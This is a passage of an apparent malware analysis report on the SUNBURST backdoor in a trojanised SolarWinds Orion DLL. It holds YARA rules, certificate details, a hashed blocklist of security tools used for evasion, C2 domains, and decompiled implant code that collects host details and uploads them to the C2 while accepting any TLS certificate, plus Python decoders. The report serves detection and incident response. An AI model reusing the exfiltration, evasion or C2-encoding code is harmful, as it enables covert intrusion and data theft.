        $fake_orion_event_encoded = "U3ItS80rCaksSFWyUvIvyszPU9IBAA==" wide
        $fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }
        $fake_orion_eventmanager_encoded = "U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==" wide
        $fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67 65 72 22 2C }
        $fake_orion_message_encoded = "U/JNLS5OTE9VslKqNqhVAgA=" wide
        $fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }
        $fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }
    condition:
        $fnv_xor and ($cmd_regex_encoded or $cmd_regex_plain) or ( ($fake_orion_event_encoded or $fake_orion_event_plain) and ($fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain) and ($fake_orion_message_encoded and $fake_orion_message_plain) )
}

rule FireEye_20_00025668_02 : SUNBURST APT backdoor
{
    meta:
        Author = "FireEye"
        Date = "2020-12-13"
        Last_Modified = "20201213_1917"
        Actor = "n/a"
        Category = "Backdoor"
        Family = "SUNBURST"
        Description = "The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2 communications. This rule is looking for each branch of the code that checks for which HTTP method is being used. This is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally designed so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."
        MD5_1 = ""
        SHA256_1 = ""
    strings:
        $a = "0y3Kzy8BAA==" wide
        $aa = "S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA" wide
        $ab = "S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=" wide
        $ac = "C88sSs1JLS4GAA==" wide
        $ad = "C/UEAA==" wide
        $ae = "C89MSU8tKQYA" wide
        $af = "8wvwBQA=" wide
        $ag = "cyzIz8nJBwA=" wide
        $ah = "c87JL03xzc/LLMkvysxLBwA=" wide
        $ai = "88tPSS0GAA==" wide
        $aj = "C8vPKc1NLQYA" wide
        $ak = "88wrSS1KS0xOLQYA" wide
        $al = "c87PLcjPS80rKQYA" wide
        $am = "Ky7PLNAvLUjRBwA=" wide
        $an = "06vIzQEA" wide
        $b = "0y3NyyxLLSpOzIlPTgQA" wide
        $c = "001OBAA=" wide
        $d = "0y0oysxNLKqMT04EAA==" wide
        $e = "0y3JzE0tLknMLQAA" wide
        $f = "003PyU9KzAEA" wide
        $h = "0y1OTS4tSk1OBAA=" wide
        $i = "K8jO1E8uytGvNqitNqytNqrVA/IA" wide
        $j = "c8rPSQEA" wide
        $k = "c8rPSfEsSczJTAYA" wide
        $l = "c60oKUp0ys9JAQA=" wide
        $m = "c60oKUp0ys9J8SxJzMlMBgA=" wide
        $n = "8yxJzMlMBgA=" wide
        $o = "88lMzygBAA==" wide
        $p = "88lMzyjxLEnMyUwGAA==" wide
        $q = "C0pNL81JLAIA" wide
        $r = "C07NzXTKz0kBAA==" wide
        $s = "C07NzXTKz0nxLEnMyUwGAA==" wide
        $t = "yy9IzStOzCsGAA==" wide
        $u = "y8svyQcA" wide
        $v = "SytKTU3LzysBAA==" wide
        $w = "C84vLUpOdc5PSQ0oygcA" wide
        $x = "C84vLUpODU4tykwLKMoHAA==" wide
        $y = "C84vLUpO9UjMC07MKwYA" wide
        $z = "C84vLUpO9UjMC04tykwDAA==" wide
    condition:
        ($a and $b and $c and $d and $e and $f and $h and $i) or ($j and $k and $l and $m and $n and $o and $p and $q and $r and $s and ($aa or $ab)) or ($t and $u and $v and $w and $x and $y and $z and ($aa or $ab)) or ($ac and $ad and $ae and $af and $ag and $ah and ($am or $an)) or ($ai and $aj and $ak and $al and ($am or $an))
}

Note on the rules: the "_encoded" strings are the Base64/deflate-packed form of the adjacent "_plain" bytes (the same packing the implant's ZipHelper.Unzip reverses at runtime), which is why each clause accepts either form. The one exception is the final clause of FireEye_20_00025668_01, which requires both the encoded and the plain form of the message string to be present.

ssdeep Matches
No matches found.

PE Metadata
Compile Date: 2020-03-24 04:52:34-04:00
Import Hash: dae02f32a21e03ce65412f6e56942daa
Company Name: SolarWinds Worldwide, LLC.
File Description: SolarWinds.Orion.Core.BusinessLayer
Internal Name: SolarWinds.Orion.Core.BusinessLayer.dll
Legal Copyright: Copyright © 1999-2020 SolarWinds Worldwide, LLC. All Rights Reserved.
Original Filename: SolarWinds.Orion.Core.BusinessLayer.dll
Product Name: SolarWinds.Orion.Core.BusinessLayer
Product Version: 2019.4.5200.9083

PE Sections
MD5                               Name     Raw Size   Entropy
9f1dcf8b4df81fdd1e33e8157fb58d9f  header   512        2.890704
ac9dc455a67c7f2c9f10725d66c115d1  .text    1001472    5.569219
69a064c0b6001299af109ed0d06f6c6f  .rsrc    1536       3.015713
275a7e1f11b8e5fefa163e47c22129b4  .reloc   512        0.101910

Relationships
32519b85c0... Connected_To avsvmcloud.com
32519b85c0... Contained_Within d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600

Description

This file is a 32-bit .NET DLL named "SolarWinds.Orion.Core.BusinessLayer.dll." It is a modified SolarWinds-signed plugin component of the Orion software framework that has been patched with the SUNBURST backdoor. This malicious file was signed with a digital certificate issued by Symantec to SolarWinds. The digital certificate should be considered compromised. Note that the signature still verifies ("Status: Valid" below): because the backdoor was inserted before signing, Authenticode validation alone does not flag this file, and the hashes above, not the signature, are what identify it.

--Begin Digital Certificate Information--
Signer: CN="Solarwinds Worldwide, LLC", O="Solarwinds Worldwide, LLC", L=Austin, S=Texas,  C=US
Issuer: CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=SymantecCorporation, C=US
SN: 0FE973752022A606ADF2A36E345DC0ED
Not Before: 1/20/2020 7:00:00 PM
Not After: 1/20/2023 6:59:59 PM
Thumbprint: 47D92D49E6F7F296260DA1AF355F941EB25360C4
Status: Valid
StatusMsg: Signature verified.
--End Digital Certificate Information--

SUNBURST provides the following capabilities on a compromised system, which are discussed in further detail below.
- Sets a 12 to 14 day delayed execution time
- Stealth
- Command and Control (C2) communication
- Collect system information
- Upload system information from the victim system
- Run specified tasks
- Terminate processes
- Download, read, write, move, delete, and execute files
- Compute file hashes
- Reboot the system
- Adjust process privileges

**DELAYED EXECUTION**

SUNBURST is executed by a legitimate SolarWinds software application designed to load and run SolarWinds plugins. Once installed, it reads its own file's last write time and adds a randomly generated delay of between 288 and 336 hours (12 - 14 days). The malware will sleep until that time has passed, after which it will begin C2 sessions to retrieve and execute commands or "Jobs" on behalf of the adversary. For incident response this means a freshly patched host shows no C2 activity for roughly two weeks, so the absence of beacons in that window does not clear a system.

**STEALTH**

SUNBURST uses obfuscated blocklists consisting of hashed process and service names to identify analysis tools and antivirus software components running as processes, services, and drivers. It uses a modified version of the FNV-1a hash algorithm to determine whether specific processes are running on the target system: it enumerates all running processes, hashes each process name, and compares the resulting hashes to a hard-coded blocklist. If no block-listed process is found, it attempts to resolve the domain "api.solarwinds.com" to test for network connectivity. If a block-listed process is found, it does not proceed with its C2 session. This evasion technique is used to keep it from being detected. The hard-coded hashes are stored in an unsigned long list named "assemblyTimeStamps." See "BLOCK LIST CHECKING FUNCTIONS" below in this report for details.

The list below pairs each hash with the name it was recovered as. Alongside process, service and driver names it also contains HTTP header names (for example "accept", "user-agent") and domain name fragments (for example "apac.lab", "dev.local"), which are kept in the same hashed array.

--Begin hard-coded list of block-listed processes and names--
1475579823244607677  100-continue
2734787258623754862  accept
1368907909245890092  afwserv
16858955978146406642  apac.lab
2597124982561782591  apimonitor-x64
2600364143812063535  apimonitor-x86
6195833633417633900  aswengsrv
2934149816356927366  aswidsagent
13029357933491444455  aswidsagenta
15194901817027173566  atrsdfw.sys
4821863173800309721  autopsy
13464308873961738403  autopsy64
3320026265773918739  autoruns
12969190449276002545  autoruns64
10657751674541025650  autorunsc
12094027092655598256  autorunsc64
2760663353550280147  avastavwrapper
8146185202538899243  avastsvc
11818825521849580123  avastui
11109294216876344399  avgadminclientservice
2797129108883749491  avgidsagent
3660705254426876796  avgsvc
3890794756780010537  avgsvca
3890769468012566366  avgsvcx
12709986806548166638  avgui
14095938998438966337  avgwdsvcx
13611051401579634621  avp
18147627057830191163  avpui
16423314183614230717  bccavsvc
11913842725949116895  binaryninja
5449730069165757263  blacklight
12679195163651834776  brcow_x_x_x_x.sys
1614465773938842903  brfilter.sys
11385275378891906608  carbonblack
13693525876560827283  carbonblackk
17204844226884380288  cavp
5984963105389676759  cb
17849680105131524334  cbcomms
18246404330670877335  cbstream
292198192373389586  cff explorer
14226582801651130532  close
11266044540366291518  connection
6116246686670134098  content-type
10734127004244879770  cork.lab
18159703063075866524  crexecprev.sys
11771945869106552231  csagent
9234894663364701749  csdevicecontrol
9061219083560670602  csfalconcontainer
8698326794961817906  csfalconservice
12790084614253405985  cutter
16570804352575357627  cve.sys
17097380490166623672  cybkerneltracker.sys
16066522799090129502  date
5219431737322569038  de4dot
15535773470978271326  debugview
11073283311104541690  dev.local
3626142665768487764  dgdmk.sys
7810436520414958497  diskmon
4030236413975199654  dmz.local
13316211011159594063  dnsd
13825071784440082496  dnspy
14480775929210717493  dotpeek32
14482658293117931546  dotpeek64
8473756179280619170  dumpcap
15587050164583443069  eamonm
12718416789200275332  eaw.sys
9559632696372799208  eelam
607197993339007484  egui
14513577387099045298  eguiproxy
4931721628717906635  ehdrv
14079676299181301772  ekbdflt
3200333496547938354  ekrn
2589926981877829912  ekrnepfw
8727477769544302060  emea.sales
17939405613729073960  epfw
17997967489723066537  epfwwfp
3778500091710709090  evidence center
8799118153397725683  exeinfope
8873858923435176895  expect
13783346438774742614  f-secure filter
16112751343173365533  f-secure gatekeeper
17624147599670377042  f-secure gatekeeper handler starter
3425260965299690882  f-secure hips
16066651430762394116  f-secure network request broker
2380224015317016190  f-secure recognizer
13655261125244647696  f-secure webui daemon
12027963942392743532  fakedns
576626207276463000  fakenet
9384605490088500348  fe_avk
15092207615430402812  feelam
6274014997237900919  fekern
3320767229281015341  fewscservice
7412338704062093516  ffdec
682250828679635420  fiddler
13014156621614176974  fileinsight
18150909006539876521  floss
5587557070429522647  fnrb32
12445177985737237804  fsaua
12445232961318634374  fsaus
17017923349298346219  fsav32
9333057603143916814  fsbts
541172992193764396  fsdevcon
10393903804869831898  fsdfw
3413052607651207697  fses
3407972863931386250  fsfw
10545868833523019926  fsgk32
521157249538507889  fsgk32st
3421213182954201407  fsma
15039834196857999838  fsma32
3421197789791424393  fsms
3413886037471417852  fsni
17978774977754553159  fsorsp
14243671177281069512  fsorspclient
14055243717250701608  fssm32
7315838824213522000  fsvista
14971809093655817917  fswebuid
10336842116636872171  gdb
6943102301517884811  groundling32.sys
13544031715334011032  groundling64.sys
397780960855462669  hexisfsmonitor.sys
13260224381505715848  hiew32
12785322942775634499  hiew32demo
17956969551821596225  hollows_hunter
14256853800858727521  idaq
8709004393777297355  idaq64
8129411991672431889  idr
15514036435533858158  if-modified-since
15997665423159927228  ildasm
10829648878147112121  ilspy
9149947745824492274  jd-gui
13852439084267373191  keep-alive
17633734304611248415  ksde
13581776705111912829  ksdeui
4578480846255629462  lab.brno
8381292265993977266  lab.local
3796405623695665524  lab.na
5942282052525294911  lab.rio
17984632978012874803  libwamf.sys
3656637464651387014  lordpe
2717025511528702475  lragentmf.sys
10501212300031893463  microsoft.tri.sensor
155978580751494388  microsoft.tri.sensor.updater
5183687599225757871  msmpeng
10063651499895178962  mssense
3575761800716667678  officemalscanner
4501656691368064027  ollydbg
7701683279824397773  pci.local
10296494671777307979  pdfstreamdumper
14630721578341374856  pe-bear
6461429591783621719  pe-sieve32
6508141243778577344  pe-sieve64
4088976323439621041  pebrowse64
9531326785919727076  peid
10235971842993272939  pestudio
2478231962306073784  peview
9903758755917170407  pexplorer
14710585101020280896  ppee
2810460305047003196  procdump
13611814135072561278  procdump64
2032008861530788751  processhacker
6491986958834001955  procexp
27407921587843457  procexp64
2128122064571842954  procmon
10484659978517092504  prodiscoverbasic
2532538262737333146  psanhost
835151375515278827  psepfilter.sys
6088115528707848728  psuamain
4454255944391929578  psuaservice
8478833628889826985  py2exedecompiler
10463926208560207521  r2agent
7080175711202577138  rabin2
8697424601205169055  radare2
16130138450758310172  ramcapture
7775177810774851294  ramcapture64
700598796416086955  redcloak
9007106680104765185  referer
506634811745884560  reflector
18294908219222222902  regmon
3588624367609827560  resourcehacker
9555688264681862794  retdec-ar-extractor
5415426428750045503  retdec-bin2llvmir
3642525650883269872  retdec-bin2pat
13135068273077306806  retdec-config
3769837838875367802  retdec-fileinfo
191060519014405309  retdec-getsig
1682585410644922036  retdec-idr2pat
7878537243757499832  retdec-llvmir2hll
13799353263187722717  retdec-macho-extractor
1367627386496056834  retdec-pat2yara
12574535824074203265  retdec-stacofin
16990567851129491937  retdec-unpacker
8994091295115840290  retdec-yarac
13876356431472225791  rundotnetdll
18392881921099771407  rvsavd.sys
5132256620104998637  saas.swi
11801746708619571308  safe-agent.sys
14968320160131875803  sbiesvc
14868920869169964081  scdbg
106672141413120087  scylla_x64
79089792725215063  scylla_x86
16335643316870329598  sense
12343334044036541897  sentinelmonitor.sys
5614586596107908838  shellcode_launcher
17291806236368054941  solarwinds.businesslayerhost
3869935012404164040  solarwindsdiagnostics
15267980678929160412  swdev.dmz
1109067043404435916  swdev.local
14111374107076822891  sysmon
3538022140597504361  sysmon64
7175363135479931834  tanium
3178468437029279937  taniumclient
13599785766252827703  taniumdetectengine
6180361713414290679  taniumendpointindex
8612208440357175863  taniumtracecli
8408095252303317471  taniumtracewebsocketclient64
7982848972385914508  task explorer
8760312338504300643  task explorer-64
17351543633914244545  tcpdump
7516148236133302073  tcpvcon
15114163911481793350  tcpview
7574774749059321801  user-agent
15457732070353984570  vboxservice
16292685861617888592  win32_remote
10374841591685794123  win64_remotex64
3045986759481489935  windbg
917638920165491138  windefend
17109238199226571972  windump
5945487981219695001  winhex
6827032273910657891  winhex64
8052533790968282297  winobj
17574002783607647274  wireshark
3341747963119755850  x32dbg
14193859431895170587  x64dbg
15695338751700748390  xagt
640589622539783622  xagtnotif
17683972236092287897  xwforensics
17439059603042731363  xwforensics64
--End hard-coded list of block-listed processes and names--

**COMMAND AND CONTROL**

During runtime, SUNBURST hashes its own parent process name and compares it to the value 17291806236368054941 (the table entry for "solarwinds.businesslayerhost"). If it does not match, the malicious class "OrionImprovementBusinessLayer" will stop executing and the DLL will continue normal activity. When communicating with its C2, SUNBURST uses the Orion Improvement Program (OIP) protocol to disguise network activity as normal SolarWinds Orion traffic. The connection with the C2 server will contain a randomly generated "customer ID" that allows the adversary to track different compromised systems. To establish C2, it constructs and resolves subdomains of "avsvmcloud.com" using a domain generation algorithm (DGA).
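The hash behind the block list above and the parent-process gate in the preceding paragraph, re-implemented as an added example; this is not the report's or the implant's code. It assumes that the "modified FNV-1a" is 64-bit FNV-1a over the UTF-8 bytes of the lower-cased name followed by an XOR with 0x5BAC903BA7D81967, which is the $fnv_xor byte sequence {67 19 D8 A7 3B 90 AC 5B} from the FireEye rule read little-endian; the blocklist subset is copied from the table above, and the process names fed in are constructed. The .exe stripping is also an assumption, made so that constructed file names match what a .NET process name looks like without its extension.

```python
"""SUNBURST blocklist hashing, re-implemented as an added example (not the report's code).

Assumption: "modified FNV-1a" = 64-bit FNV-1a over UTF-8 bytes of the lower-cased
name, then XOR with 0x5BAC903BA7D81967 (6605813339339102567), i.e. the $fnv_xor
bytes {67 19 D8 A7 3B 90 AC 5B} of the FireEye rule read little-endian.
The blocklist subset is copied from the report's table; process names below are
constructed test input.
"""
from typing import Dict, Iterable, List

FNV64_OFFSET = 0xCBF29CE484222325
FNV64_PRIME = 0x100000001B3
MASK64 = (1 << 64) - 1
SUNBURST_XOR = 0x5BAC903BA7D81967      # == 6605813339339102567

PARENT_HASH = 17291806236368054941      # table entry for "solarwinds.businesslayerhost"


def sunburst_hash(name: str) -> int:
    """FNV-1a 64 over the UTF-8 bytes, then XOR with the SUNBURST constant."""
    h = FNV64_OFFSET
    for b in name.encode("utf-8"):
        h ^= b
        h = (h * FNV64_PRIME) & MASK64
    return h ^ SUNBURST_XOR


# Subset of the report's assemblyTimeStamps table: hash -> recovered name
BLOCKLIST: Dict[int, str] = {
    17291806236368054941: "solarwinds.businesslayerhost",
    17574002783607647274: "wireshark",
    6491986958834001955: "procexp",
    3045986759481489935: "windbg",
    14111374107076822891: "sysmon",
    5183687599225757871: "msmpeng",
    15695338751700748390: "xagt",
}


def normalise(process_name: str) -> str:
    """Lower-case and drop a trailing .exe (assumption: the implant hashes the
    lower-cased process name, which in .NET carries no extension)."""
    name = process_name.lower()
    return name[:-4] if name.endswith(".exe") else name


def blocked_processes(process_names: Iterable[str]) -> List[str]:
    """Names whose hash is in the table; the implant stays dormant if this is non-empty."""
    return [normalise(p) for p in process_names if sunburst_hash(normalise(p)) in BLOCKLIST]


def parent_gate_passes(parent_process_name: str) -> bool:
    """The runtime check from the C2 section: parent hash must equal PARENT_HASH,
    otherwise OrionImprovementBusinessLayer does not run."""
    return sunburst_hash(normalise(parent_process_name)) == PARENT_HASH


def recover_names(hashes: Iterable[int], candidates: Iterable[str]) -> Dict[int, str]:
    """Dictionary attack on the hashed list: how a table like the report's is rebuilt
    from a wordlist of tool, service and driver names."""
    table = {sunburst_hash(c): c for c in candidates}
    return {h: table[h] for h in hashes if h in table}


if __name__ == "__main__":
    running = ["svchost.exe", "Wireshark.exe", "ProcExp.exe", "notepad.exe"]
    print("blocked:", blocked_processes(running))
    print("parent gate:", parent_gate_passes("SolarWinds.BusinessLayerHost.exe"))
    print(recover_names([3045986759481489935, 1], ["windbg", "x64dbg"]))
```

Two practical consequences follow from the code: any tool whose process name hashes into the table keeps the implant silent, so a forensic host running Wireshark or Process Explorer will never see it beacon, and the hashes are reversible only by dictionary, which is how the names in the report's table were obtained.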
The following format is used to generate the domain name:

--Begin format of the domain name--
.appsync-api.eu-west-1.avsvmcloud.com
.appsync-api.us-west-2.avsvmcloud.com
.appsync-api.us-east-1.avsvmcloud.com
.appsync-api.us-east-2.avsvmcloud.com
--End format of the domain name--

It will attempt to make a Canonical Name (CNAME) query for different third-level domain names, combined with the DGA-generated label, to verify that the C2 server is accessible before starting its command and control session.

--Begin domain names combined with DGA--
6a57jk2ba1d9keg15cbg.appsync-api.eu-west-1.avsvmcloud.com
7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com
gq1h856599gqh538acqn.appsync-api.us-west-2.avsvmcloud.com
ihvpgv9psvq02ffo77et.appsync-api.us-east-2.avsvmcloud.com
k5kcubuassl3alrf7gm3.appsync-api.eu-west-1.avsvmcloud.com
mhdosoksaccf9sni9icp.appsync-api.eu-west-1.avsvmcloud.com
--End domain names combined with DGA--

Outbound communications are encoded using an embedded class named "CryptoHelper." The class contains two functions named "CreateSecureString" and "Base64Encode." The function "CreateSecureString" generates a random byte and uses it to encode the string provided. The randomly generated byte, used as the XOR key, is stored at offset 0x00 of the encoded string, allowing the adversary to decode the traffic received from this implant (and, since the key travels with the message, allowing anyone holding a capture of the traffic to decode it as well). The function "CreateSecureString" takes two arguments: a byte array holding the data to be encoded and a bool. If the bool is set to "true", the function ORs the generated XOR key byte with the value 128 before using it to XOR-encode the provided data. It then calls the Base64Encode function to further obfuscate the communication.

--Begin CreateSecureString Function--
private static string CreateSecureString(byte[] data, bool flag)
{
    byte[] bytes = new byte[data.Length + 1];
    bytes[0] = (byte) new Random().Next(1, (int) sbyte.MaxValue);
    if (flag)
        bytes[0] |= (byte) 128;
    for (int index = 1; index < bytes.Length; ++index)
        bytes[index] = (byte) ((uint) data[index - 1] ^ (uint) bytes[0]);
    return Base64Encode(bytes, true);
}
--End CreateSecureString Function--

The Base64Encode function is a modified version of the Base64 algorithm that uses the custom alphabet "ph2eifo3n5utg1j8d94qrvbmk0sal76c". This custom encoding makes it harder to interpret network traffic sent between this malicious implant and the remote C2 server; the custom alphabet and algorithm are required to decode the network traffic.

--Begin Base64Encode Function--
private static string Base64Encode(byte[] bytes, bool rt)
{
    string str1 = OrionImprovementBusinessLayer.ZipHelper.Unzip("K8gwSs1MyzfOMy0tSTfMskixNCksKkvKzTYoTswxN0sGAA==");
    string str2 = "";
    uint num1 = 0;
    int num2 = 0;
    foreach (byte num3 in bytes)
    {
        num1 |= (uint) num3 << num2;
        for (num2 += 8; num2 >= 5; num2 -= 5)
        {
            str2 += str1[(int) num1 & 31].ToString();
            num1 >>= 5;
        }
    }
    if (num2 > 0)
    {
        if (rt)
            num1 |= (uint) (new Random().Next() << num2);
        str2 += str1[(int) num1 & 31].ToString();
    }
    return str2;
}
--End Base64Encode Function--

**COLLECT SYSTEM INFORMATION**

The collection of system description info is carried out by the CollectSystemDescription function. It will collect the following information:

* Victim domain SID
* Domain name
* Hostname
* Username
* Operating System (OS) version
* System directory
* Environment tick count (the time since the system was last rebooted)
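The two obfuscation routines from the COMMAND AND CONTROL section, reimplemented in Python as an added, defender-side example (this is not code from the report or from the sample, and the function and variable names are mine): get_hash is the FNV-1a variant behind the parent-process check, the block list and the header-name switch in UploadSystemDescription, assuming the standard 64-bit FNV-1a offset basis and prime (the report only says "modified FNV-1a") with the final XOR constant taken from the $fnv_xor bytes of the FireEye YARA rule later in this report, read little-endian; custom_base64_encode and create_secure_string port Base64Encode and CreateSecureString, and the two decode functions are their inverses, which the report does not show.

```python
import random

# Custom 32-character alphabet named in the report. Each output character
# carries 5 bits, which is what the '& 31' mask and 5-bit shifts in
# Base64Encode implement (a base32-style scheme despite the function's name).
ALPHABET = "ph2eifo3n5utg1j8d94qrvbmk0sal76c"
_INDEX = {c: i for i, c in enumerate(ALPHABET)}

# Standard 64-bit FNV-1a parameters (assumed; the report does not state them)
# and the final XOR constant: the $fnv_xor byte sequence from the FireEye
# YARA rule in this report, interpreted as a little-endian 64-bit integer.
FNV_OFFSET = 14695981039346656037
FNV_PRIME = 1099511628211
FNV_XOR = int.from_bytes(bytes.fromhex("6719D8A73B90AC5B"), "little")
MASK64 = (1 << 64) - 1


def get_hash(s: str) -> int:
    """FNV-1a-64 over the UTF-8 bytes of s, XORed with FNV_XOR at the end.
    SUNBURST applies this to lower-cased process names and header names."""
    h = FNV_OFFSET
    for b in s.encode("utf-8"):
        h = ((h ^ b) * FNV_PRIME) & MASK64
    return h ^ FNV_XOR


def custom_base64_encode(data: bytes, rt: bool = True) -> str:
    """Port of Base64Encode: bits are packed LSB-first and emitted 5 at a
    time. With rt=True the unused high bits of a final partial character
    are randomised, as in the sample, so the last character can vary."""
    out, acc, nbits = [], 0, 0
    for b in data:
        acc |= b << nbits
        nbits += 8
        while nbits >= 5:
            out.append(ALPHABET[acc & 31])
            acc >>= 5
            nbits -= 5
    if nbits > 0:
        if rt:
            acc |= random.getrandbits(5 - nbits) << nbits
        out.append(ALPHABET[acc & 31])
    return "".join(out)


def custom_base64_decode(s: str) -> bytes:
    """Inverse of custom_base64_encode. Trailing pad bits (random when
    rt=True) never complete a byte and are discarded."""
    out, acc, nbits = bytearray(), 0, 0
    for ch in s:
        if ch not in _INDEX:
            raise ValueError(f"character {ch!r} is not in the SUNBURST alphabet")
        acc |= _INDEX[ch] << nbits
        nbits += 5
        if nbits >= 8:
            out.append(acc & 0xFF)
            acc >>= 8
            nbits -= 8
    return bytes(out)


def create_secure_string(data: bytes, flag: bool) -> str:
    """Port of CreateSecureString: a random key byte in 1..126 (bit 7 set
    when flag is True) is stored at offset 0 and XORed over every byte."""
    key = random.randint(1, 126)  # Random.Next(1, sbyte.MaxValue) -> 1..126
    if flag:
        key |= 0x80
    return custom_base64_encode(bytes([key]) + bytes(b ^ key for b in data), True)


def decode_secure_string(encoded: str) -> tuple[bytes, bool]:
    """Recover (plaintext, flag) from CreateSecureString output. The key is
    the first decoded byte, so no secret is needed: obfuscation, not encryption."""
    raw = custom_base64_decode(encoded)
    if not raw:
        raise ValueError("empty message")
    key = raw[0]
    return bytes(b ^ key for b in raw[1:]), bool(key & 0x80)


if __name__ == "__main__":
    # Header-name hashes quoted in UploadSystemDescription.
    for name in ("accept", "content-type", "user-agent"):
        print(f"{name:<14} {get_hash(name)}")
    # Constructed sample message, not real SUNBURST traffic.
    sample = b"example system description"
    wire = create_secure_string(sample, True)
    print(wire, decode_secure_string(wire))
```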
--Begin CollectSystemDescription Function--
public static void CollectSystemDescription(string info, out string result)
{
    result = (string) null;
    int i = 0;
    string domainName = IPGlobalProperties.GetIPGlobalProperties().DomainName;
    result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + domainName;
    try
    {
        string str = ((SecurityIdentifier) new NTAccount(domainName, OrionImprovementBusinessLayer.ZipHelper.Unzip("Administrator")).Translate(typeof (SecurityIdentifier))).AccountDomainSid.ToString();
        result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + str;
    }
    catch
    {
        result += OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i);
    }
    result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + IPGlobalProperties.GetIPGlobalProperties().HostName;
    result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + Environment.UserName;
    result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + OrionImprovementBusinessLayer.GetOSVersion(true);
    result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + Environment.SystemDirectory;
    result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + (object) (int) TimeSpan.FromMilliseconds((double) (uint) Environment.TickCount).TotalDays;
    result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + info + "\n";
    result += OrionImprovementBusinessLayer.GetNetworkAdapterConfiguration();
}
--End CollectSystemDescription Function--

The GetNetworkAdapterConfiguration function gathers information on any attached network adapters and their configuration.
--Begin GetNetworkAdapterConfiguration Function--
private static string GetNetworkAdapterConfiguration()
{
    string str = "";
    try
    {
        using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(OrionImprovementBusinessLayer.ZipHelper.Unzip("Select * From Win32_NetworkAdapterConfiguration where IPEnabled=true")))
        {
            foreach (ManagementObject managementObject in managementObjectSearcher.Get().Cast<ManagementObject>())
            {
                str += "\n";
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip("Description"));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip("MACAddress"));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip("DHCPEnabled"));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip("DHCPServer"));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip("DNSHostName"));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip("DNSDomainSuffixSearchOrder"));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip("DNSServerSearchOrder"));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip("IPAddress"));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip("IPSubnet"));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip("DefaultIPGateway"));
            }
            return str;
        }
    }
    catch (Exception ex)
    {
        return str + ex.Message;
    }
}
--End GetNetworkAdapterConfiguration Function--

**UPLOAD SYSTEM INFORMATION**

The "UploadSystemDescription" function is used to exfiltrate the gathered system information. It parses the HTTP session information it is given to form a full HTTP request that is sent to the remote C2 server. The modified FNV-1a hash algorithm is used to hash certain words associated with outbound HTTP requests, such as "accept" (hash: 2734787258623754862) and "content-type" (hash: 6116246686670134098). The function then matches the header names in the provided HTTP session data against these hash values rather than against the strings themselves, which obfuscates the purpose of the code and makes it more difficult to identify, manually or heuristically, that its intent is to generate an outbound HTTP session.

--Begin UploadSystemDescription Function--
public static void UploadSystemDescription(string[] args, out string result, IWebProxy proxy)
{
    result = (string) null;
    string requestUriString = args[0];
    string s1 = args[1];
    string s2 = args.Length >= 3 ? args[2] : (string) null;
    string[] strArray = Encoding.UTF8.GetString(Convert.FromBase64String(s1)).Split(new string[3]
    {
        "\r\n",
        "\r",
        "\n"
    }, StringSplitOptions.None);
    HttpWebRequest httpWebRequest1 = (HttpWebRequest) WebRequest.Create(requestUriString);
    HttpWebRequest httpWebRequest2 = httpWebRequest1;
    httpWebRequest2.set_ServerCertificateValidationCallback(httpWebRequest2.get_ServerCertificateValidationCallback() + (RemoteCertificateValidationCallback) ((sender, cert, chain, sslPolicyErrors) => true));
    httpWebRequest1.Proxy = proxy;
    httpWebRequest1.Timeout = 120000;
    httpWebRequest1.Method = strArray[0].Split(' ')[0];
    foreach (string header in strArray)
    {
        int length = header.IndexOf(':');
        if (length > 0)
        {
            string headerName = header.Substring(0, length);
            string s3 = header.Substring(length + 1).TrimStart((char[]) Array.Empty<char>());
            if (!WebHeaderCollection.IsRestricted(headerName))
            {
                httpWebRequest1.Headers.Add(header);
            }
            else
            {
                switch (OrionImprovementBusinessLayer.GetHash(headerName.ToLower()))
                {
                    case 2734787258623754862:
